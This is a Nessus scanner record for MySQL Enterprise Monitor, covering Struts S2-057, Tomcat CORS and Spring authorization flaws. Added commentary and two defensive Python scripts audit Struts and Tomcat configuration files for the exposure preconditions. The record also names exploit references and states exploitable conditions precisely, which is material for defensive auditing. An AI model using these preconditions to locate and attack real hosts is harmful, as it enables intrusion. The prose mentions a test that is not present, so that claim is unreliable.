According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the following vulnerabilities in its subcomponents:
- Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16 are prone to remote code execution (S2-057) when alwaysSelectFullNamespace is true (set directly or by a plugin such as the Convention Plugin) and either a result is declared without a namespace while its enclosing package has no namespace or a wildcard namespace, or a url tag is used without value and action attributes under a package with no or wildcard namespace. In those cases the namespace is taken from the request URL and evaluated as an OGNL expression. (CVE-2018-11776)
- The default settings of the CORS filter shipped in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52 and 7.0.41 to 7.0.88 are insecure: they enable 'supportsCredentials' for all origins, so a page on any origin can issue credentialed cross-origin requests and read the responses. Users of the CORS filter are expected to have configured it for their environment rather than run it with the defaults, so most deployments should not be affected. (CVE-2018-8014)
- Spring Framework version 5.0.5, when used in combination with any version of Spring Security, contains an authorization bypass in method security: a malicious user can invoke methods that should be restricted. (CVE-2018-1258)
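The first bullet lists the S2-057 preconditions as configuration facts, which makes them checkable statically. The following is an added example (not Tenable's plugin code and not anything from the Struts project) that parses a struts.xml and reports results that meet all three conditions: the alwaysSelectFullNamespace constant is true, the enclosing package has no namespace or a wildcard one, and the result carries no explicit namespace parameter. Only struts.xml results are covered, not url tags in JSPs. The two configurations are constructed for the example, and restricting the check to the redirectAction and chain result types (the ones that resolve a target namespace at request time) is this example's own choice.

```python
"""Static audit of a struts.xml for the S2-057 (CVE-2018-11776) preconditions.

Added example; not code from the Nessus plugin or from Apache Struts.
"""
import xml.etree.ElementTree as ET

# Result types that compute a target namespace at request time when none is
# configured. Limiting the check to these two is this example's assumption.
NAMESPACE_SENSITIVE_RESULTS = {"redirectAction", "chain"}

CONSTANT = "struts.mapper.alwaysSelectFullNamespace"


def always_select_full_namespace(root):
    """True when struts.xml sets the constant to true (the Struts default is false)."""
    for c in root.iter("constant"):
        if c.get("name") == CONSTANT:
            return c.get("value", "").strip().lower() == "true"
    return False


def package_namespace_is_weak(pkg):
    """A package with no namespace attribute, an empty one, or a wildcard in it."""
    ns = pkg.get("namespace")
    return ns is None or ns == "" or "*" in ns


def result_has_namespace(result):
    """True when the result declares <param name="namespace">...</param>."""
    return any(p.get("name") == "namespace" for p in result.findall("param"))


def find_s2_057_exposures(struts_xml):
    """Return (package, action, result type) triples meeting all S2-057 preconditions."""
    root = ET.fromstring(struts_xml)
    if not always_select_full_namespace(root):
        return []
    findings = []
    for pkg in root.iter("package"):
        if not package_namespace_is_weak(pkg):
            continue
        for action in pkg.findall("action"):
            for result in action.findall("result"):
                rtype = result.get("type", "dispatcher")  # Struts' default result type
                if rtype in NAMESPACE_SENSITIVE_RESULTS and not result_has_namespace(result):
                    findings.append((pkg.get("name"), action.get("name"), rtype))
    return findings


# Constructed sample: constant on, package without namespace, result without namespace.
WEAK_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="login" class="com.example.LoginAction">
      <result type="redirectAction">
        <param name="actionName">home</param>
      </result>
    </action>
  </package>
</struts>
"""

# Constructed sample: the advisory's mitigation applied, namespaces stated explicitly.
FIXED_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" namespace="/app" extends="struts-default">
    <action name="login" class="com.example.LoginAction">
      <result type="redirectAction">
        <param name="actionName">home</param>
        <param name="namespace">/app</param>
      </result>
    </action>
  </package>
</struts>
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_STRUTS_XML), ("fixed", FIXED_STRUTS_XML)):
        print(label, find_s2_057_exposures(cfg))
```

The upgrade to Struts 2.3.35 / 2.5.17 (bundled in the fixed MySQL Enterprise Monitor releases) is the real remedy; the explicit-namespace form is the configuration-level mitigation the Struts advisory recommends and is worth keeping even after upgrading.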
Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number. The fix is to upgrade MySQL Enterprise Monitor to 3.4.10, 4.0.7 or 8.0.3 (or later), as referenced in the Oracle October 2018 Critical Patch Update.
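The Tomcat item (CVE-2018-8014) is about defaults, so whether a deployment is exposed depends on which init-params its web.xml sets and which Tomcat build fills in the rest. The following is an added example, not Tomcat source or plugin code: it resolves a CorsFilter's init-params against the filter's built-in defaults before the fix (cors.allowed.origins "*", cors.support.credentials "true") and in the fix releases 9.0.9 / 8.5.32 / 8.0.53 / 7.0.89 (credentials default changed to "false"), and flags the combination the advisory names. With that combination the filter answers any Origin with Access-Control-Allow-Origin set to that origin plus Access-Control-Allow-Credentials: true, so any site a logged-in user visits can make cookie-bearing requests and read the responses. The web.xml fragments and the hostname in them are constructed for this example; check the filter documentation of the build you run for its current defaults.

```python
"""Effective-configuration check for Tomcat's CorsFilter (CVE-2018-8014).

Added example; not Tomcat code and not the Nessus plugin.
"""
import xml.etree.ElementTree as ET

CORS_FILTER_CLASS = "org.apache.catalina.filters.CorsFilter"

# Filter defaults before the fix and in the fix releases (9.0.9/8.5.32/8.0.53/7.0.89).
PRE_FIX_DEFAULTS = {"cors.allowed.origins": "*", "cors.support.credentials": "true"}
POST_FIX_DEFAULTS = {"cors.allowed.origins": "*", "cors.support.credentials": "false"}


def _local(tag):
    """Strip an XML namespace prefix such as {http://xmlns.jcp.org/xml/ns/javaee}."""
    return tag.rsplit("}", 1)[-1]


def _child_text(el, name):
    for child in el:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""


def cors_filter_params(web_xml):
    """Init-params of the first CorsFilter declared in web.xml, or None if absent."""
    root = ET.fromstring(web_xml)
    for flt in root.iter():
        if _local(flt.tag) != "filter" or _child_text(flt, "filter-class") != CORS_FILTER_CLASS:
            continue
        return {
            _child_text(p, "param-name"): _child_text(p, "param-value")
            for p in flt if _local(p.tag) == "init-param"
        }
    return None


def credentials_for_any_origin(params, defaults):
    """True when the resolved configuration sends credentials to every origin."""
    effective = {**defaults, **params}
    any_origin = effective["cors.allowed.origins"].strip() == "*"
    creds = effective["cors.support.credentials"].strip().lower() == "true"
    return any_origin and creds


def audit_web_xml(web_xml):
    """Exposure on unfixed builds and on fix-release builds for one web.xml."""
    params = cors_filter_params(web_xml)
    if params is None:
        return {"cors_filter": False, "exposed_before_fix": False, "exposed_after_fix": False}
    return {
        "cors_filter": True,
        "exposed_before_fix": credentials_for_any_origin(params, PRE_FIX_DEFAULTS),
        "exposed_after_fix": credentials_for_any_origin(params, POST_FIX_DEFAULTS),
    }


# Constructed: the filter enabled with no init-params, i.e. the default configuration.
DEFAULT_CORS_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <filter>
    <filter-name>CorsFilter</filter-name>
    <filter-class>org.apache.catalina.filters.CorsFilter</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>CorsFilter</filter-name>
    <url-pattern>/*</url-pattern>
  </filter-mapping>
</web-app>
"""

# Constructed: origins pinned to one hostname (hypothetical), credentials only for it.
PINNED_CORS_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <filter>
    <filter-name>CorsFilter</filter-name>
    <filter-class>org.apache.catalina.filters.CorsFilter</filter-class>
    <init-param>
      <param-name>cors.allowed.origins</param-name>
      <param-value>https://mem.example.internal:18443</param-value>
    </init-param>
    <init-param>
      <param-name>cors.support.credentials</param-name>
      <param-value>true</param-value>
    </init-param>
  </filter>
  <filter-mapping>
    <filter-name>CorsFilter</filter-name>
    <url-pattern>/*</url-pattern>
  </filter-mapping>
</web-app>
"""

if __name__ == "__main__":
    print("defaults:", audit_web_xml(DEFAULT_CORS_WEB_XML))
    print("pinned:  ", audit_web_xml(PINNED_CORS_WEB_XML))
```

Note the last case in the test below: a web.xml that sets cors.support.credentials to true while leaving origins at "*" stays exposed on fixed builds too, which is the point of the advisory's remark that the defaults only matter for deployments that never configured the filter.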
{"id": "MYSQL_ENTERPRISE_MONITOR_8_0_3.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "MySQL Enterprise Monitor 3.4.x < 3.4.10 / 4.x < 4.0.7 / 8.x < 8.0.3 Multiple Vulnerabilities (Oct 2018 CPU)", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the following vulnerabilities in its subcomponents:\n\n - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace. (CVE-2018-11776)\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n\n - Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. 
(CVE-2018-1258)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "published": "2020-07-24T00:00:00", "modified": "2023-04-25T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/138901", "reporter": "This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8014", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1258", "https://www.oracle.com/security-alerts/cpuoct2018.html"], "cvelist": ["CVE-2018-11776", "CVE-2018-1258", "CVE-2018-8014"], "immutableFields": [], "lastseen": "2023-10-06T15:11:50", "viewCount": 42, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1"]}, {"type": "almalinux", "idList": ["ALSA-2019:1529"]}, {"type": "amazon", "idList": ["ALAS-2018-1055", "ALAS-2018-1056", "ALAS2-2020-1402"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486"]}, {"type": "centos", "idList": ["CESA-2019:2205"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0849"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2018-11776"]}, {"type": "cisco", "idList": ["CISCO-SA-20180823-APACHE-STRUTS"]}, {"type": "cve", "idList": ["CVE-2018-11776", "CVE-2018-1258", "CVE-2018-8014"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1400-1:35C3A", "DEBIAN:DLA-1400-1:B4EC8", "DEBIAN:DLA-1883-1:3E939", "DEBIAN:DSA-4596-1:D180A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-8014"]}, {"type": "dsquare", "idList": ["E-666"]}, {"type": "exploitdb", "idList": ["EDB-ID:45260", "EDB-ID:45367"]}, {"type": "exploitpack", "idList": 
["EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE"]}, {"type": "f5", "idList": ["F5:K11420556", "F5:K18193959", "F5:K60499474"]}, {"type": "fedora", "idList": ["FEDORA:64CD76075F16", "FEDORA:6BF9F60769FE"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "github", "idList": ["GHSA-CR6J-3JP9-RW65", "GHSA-CXRJ-66C5-9FMH", "GHSA-R4X2-3CQ5-HQVP", "GITHUB:0519EA92487B44F364A1B35C85049455"]}, {"type": "githubexploit", "idList": ["3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "CD8CABD7-BE65-5434-B682-F73ABA737C65"]}, {"type": "ibm", "idList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}, {"type": "ics", "idList": ["ICSMA-21-187-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:E9D83907E76B2B468512918F211FB65E", "IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"]}, {"type": "kaspersky", "idList": ["KLA11256"]}, {"type": "kitploit", "idList": ["KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:8708017483803645203"]}, {"type": "krebs", "idList": ["KREBS:B3A2371A1AB31AB3CE2E3F1B2243FDC6"]}, {"type": "mageia", "idList": ["MGASA-2018-0479"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-STRUTS2_NAMESPACE_OGNL-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891264", "MYHACK58:62201891267", "MYHACK58:62201993410", "MYHACK58:62201993737"]}, {"type": "nessus", "idList": ["700689.PASL", "700695.PASL", "700707.PASL", "700708.PASL", "AL2_ALAS-2020-1402.NASL", "ALA_ALAS-2018-1055.NASL", "ALA_ALAS-2018-1056.NASL", "CENTOS8_RHSA-2019-1529.NASL", "CENTOS_RHSA-2019-2205.NASL", "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "DEBIAN_DLA-1883.NASL", "DEBIAN_DSA-4596.NASL", "EULEROS_SA-2018-1220.NASL", "EULEROS_SA-2018-1227.NASL", "FEDORA_2018-B1832101B8.NASL", "OPENSUSE-2018-1019.NASL", "OPENSUSE-2018-1129.NASL", 
"OPENSUSE-2019-770.NASL", "ORACLELINUX_ELSA-2019-1529.NASL", "ORACLELINUX_ELSA-2019-2205.NASL", "ORACLE_ENTERPRISE_MANAGER_APR_2019_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2019_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2020_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_APR_2019_CPU.NASL", "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_OCT_2018.NASL", "ORACLE_OATS_CPU_JAN_2019.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2019.NASL", "PHOTONOS_PHSA-2018-1_0-0154.NASL", "PHOTONOS_PHSA-2018-2_0-0065.NASL", "REDHAT-RHSA-2018-2469.NASL", "REDHAT-RHSA-2019-0451.NASL", "REDHAT-RHSA-2019-1529.NASL", "REDHAT-RHSA-2019-2205.NASL", "SL_20190806_TOMCAT_ON_SL7_X.NASL", "STRUTS_2_5_17.NASL", "STRUTS_2_5_17_RCE.NASL", "TOMCAT_7_0_89.NASL", "TOMCAT_8_0_53.NASL", "TOMCAT_8_5_32.NASL", "TOMCAT_9_0_9.NASL", "UBUNTU_USN-3665-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108792", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310704596", "OPENVAS:1361412562310813378", "OPENVAS:1361412562310813786", "OPENVAS:1361412562310843539", "OPENVAS:1361412562310851897", "OPENVAS:1361412562310852045", "OPENVAS:1361412562310875012", "OPENVAS:1361412562310875539", "OPENVAS:1361412562310891883", "OPENVAS:1361412562311220181220", "OPENVAS:1361412562311220181227"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2019", "ORACLE:CPUAPR2020", "ORACLE:CPUJAN2019", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2018", "ORACLE:CPUOCT2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1529", "ELSA-2019-2205"]}, {"type": "osv", "idList": ["OSV:DLA-1400-1", "OSV:DLA-1400-2", "OSV:DLA-1883-1", "OSV:DSA-4596-1", "OSV:GHSA-CR6J-3JP9-RW65", "OSV:GHSA-CXRJ-66C5-9FMH", "OSV:GHSA-R4X2-3CQ5-HQVP"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149086", "PACKETSTORM:149087", "PACKETSTORM:149277"]}, {"type": "photon", "idList": ["PHSA-2018-0065", "PHSA-2018-0154", "PHSA-2018-1.0-0154", "PHSA-2018-2.0-0065"]}, {"type": "qualysblog", 
"idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "QUALYSBLOG:5E5409E093DE06FE967B988870D82540"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085"]}, {"type": "redhat", "idList": ["RHSA-2018:2469", "RHSA-2018:2470", "RHSA-2018:3768", "RHSA-2019:0450", "RHSA-2019:0451", "RHSA-2019:1529", "RHSA-2019:2205", "RHSA-2019:2413"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11776", "RH:CVE-2018-1258", "RH:CVE-2018-8014"]}, {"type": "rocky", "idList": ["RLSA-2019:1529"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:2740-1", "OPENSUSE-SU-2018:3054-1"]}, {"type": "symantec", "idList": ["SMNTC-104222", "SMNTC-1463"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C"]}, {"type": "thn", "idList": ["THN:72352D205E5586C5585536F8661A10E4", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:EF08CCF54E69481550D84949A563BAD5"]}, {"type": "threatpost", "idList": ["THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "THREATPOST:0FC293825070B81036932BDB41D793B5", "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "THREATPOST:2F30C320035805DB537579B86877517E", "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E984089A4842B564B374B807AF915A44", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "tomcat", "idList": 
["TOMCAT:15BD868F3B05972CB1A45C65508CE8A7", "TOMCAT:19DF5AAB3C67D0C43C1BB8ACA9B2D28A", "TOMCAT:79D3367A4A503772BFF81DAA100293B0", "TOMCAT:F6F7ED16C563B059B962D4FE1AF6BBAB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F79486D4EB7A8032A33EF8200A559E62"]}, {"type": "ubuntu", "idList": ["USN-3665-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-11776", "UB:CVE-2018-1258", "UB:CVE-2018-8014"]}, {"type": "veracode", "idList": ["VERACODE:13001", "VERACODE:6270", "VERACODE:6315", "VERACODE:7342"]}, {"type": "zdt", "idList": ["1337DAY-ID-30956", "1337DAY-ID-30965", "1337DAY-ID-30966", "1337DAY-ID-31056"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1"]}, {"type": "amazon", "idList": ["ALAS-2018-1055", "ALAS-2018-1056", "ALAS2-2020-1402"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037"]}, {"type": "centos", "idList": ["CESA-2019:2205"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0849"]}, {"type": "cisco", "idList": ["CISCO-SA-20180823-APACHE-STRUTS"]}, {"type": "cve", "idList": ["CVE-2018-11776", "CVE-2018-1258", "CVE-2018-8014"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1400-1:35C3A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-8014"]}, {"type": "dsquare", "idList": ["E-666"]}, {"type": "exploitdb", "idList": ["EDB-ID:45260"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE"]}, {"type": "f5", "idList": ["F5:K18193959", "F5:K60499474"]}, {"type": "fedora", "idList": ["FEDORA:64CD76075F16", "FEDORA:6BF9F60769FE"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "github", "idList": ["GHSA-CR6J-3JP9-RW65", "GHSA-CXRJ-66C5-9FMH", "GHSA-R4X2-3CQ5-HQVP"]}, {"type": "githubexploit", "idList": ["B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "ibm", "idList": 
["B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:E9D83907E76B2B468512918F211FB65E"]}, {"type": "kaspersky", "idList": ["KLA11256"]}, {"type": "kitploit", "idList": ["KITPLOIT:8708017483803645203"]}, {"type": "krebs", "idList": ["KREBS:B3A2371A1AB31AB3CE2E3F1B2243FDC6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_NAMESPACE_OGNL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891267"]}, {"type": "nessus", "idList": ["CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "FEDORA_2018-B1832101B8.NASL", "MYSQL_ENTERPRISE_MONITOR_WEB_DETECT.NASL", "OPENSUSE-2018-1019.NASL", "OPENSUSE-2018-1129.NASL", "PHOTONOS_PHSA-2018-1_0-0154.NASL", "PHOTONOS_PHSA-2018-2_0-0065.NASL", "REDHAT-RHSA-2018-2469.NASL", "STRUTS_2_5_17.NASL", "UBUNTU_USN-3665-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813378", "OPENVAS:1361412562310813786", "OPENVAS:1361412562310851897", "OPENVAS:1361412562310875012"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1529", "ELSA-2019-2205"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149086", "PACKETSTORM:149087", "PACKETSTORM:149277"]}, {"type": "photon", "idList": ["PHSA-2018-1.0-0154", "PHSA-2018-2.0-0065"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "QUALYSBLOG:5E5409E093DE06FE967B988870D82540"]}, {"type": "redhat", "idList": ["RHSA-2019:2413"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11776", "RH:CVE-2018-1258", "RH:CVE-2018-8014"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:2740-1", "OPENSUSE-SU-2018:3054-1"]}, {"type": "symantec", "idList": ["SMNTC-1463"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C"]}, {"type": "thn", "idList": ["THN:72352D205E5586C5585536F8661A10E4", "THN:89C2482FECD181DD37C6DAEEB7A66FA9"]}, {"type": "threatpost", "idList": 
["THREATPOST:2F30C320035805DB537579B86877517E", "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "tomcat", "idList": ["TOMCAT:19DF5AAB3C67D0C43C1BB8ACA9B2D28A"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F79486D4EB7A8032A33EF8200A559E62"]}, {"type": "ubuntu", "idList": ["USN-3665-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-1258", "UB:CVE-2018-8014"]}, {"type": "zdt", "idList": ["1337DAY-ID-30956", "1337DAY-ID-30965", "1337DAY-ID-30966", "1337DAY-ID-31056"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-11776", "epss": 0.97556, "percentile": 0.99994, "modified": "2023-05-07"}, {"cve": "CVE-2018-1258", "epss": 0.0046, "percentile": 0.71678, "modified": "2023-05-07"}, {"cve": "CVE-2018-8014", "epss": 0.14402, "percentile": 0.94884, "modified": "2023-05-07"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1696605202, "score": 1698839776, "epss": 0}, "_internal": {"score_hash": "0abf866415c0db04625c9cf270c74adf"}, "pluginID": "138901", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138901);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2018-1258\", \"CVE-2018-8014\", \"CVE-2018-11776\");\n script_bugtraq_id(\n 104203,\n 104222,\n 104530,\n 105125,\n 105538\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"MySQL Enterprise Monitor 3.4.x < 3.4.10 / 4.x < 4.0.7 / 8.x < 8.0.3 Multiple Vulnerabilities (Oct 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"MySQL Enterprise Monitor running on the remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According 
to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the\nfollowing vulnerabilities in its subcomponents:\n\n - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when\n alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results\n are used with no namespace and in same time, its upper package have no or wildcard namespace and similar\n to results, same possibility when using url tag which doesn't have value and action set and in same time,\n its upper package have no or wildcard namespace. (CVE-2018-11776)\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It\n is expected that users of the CORS filter will have configured it appropriately for their environment\n rather than using it in the default configuration. Therefore, it is expected that most users will not be\n impacted by this issue. (CVE-2018-8014)\n\n - Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an\n authorization bypass when using method security. An unauthorized malicious user can gain unauthorized\n access to methods that should be restricted. 
(CVE-2018-1258)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2018.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.4.10, 4.0.7, 8.0.3 or later as referenced in the Oracle security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n 
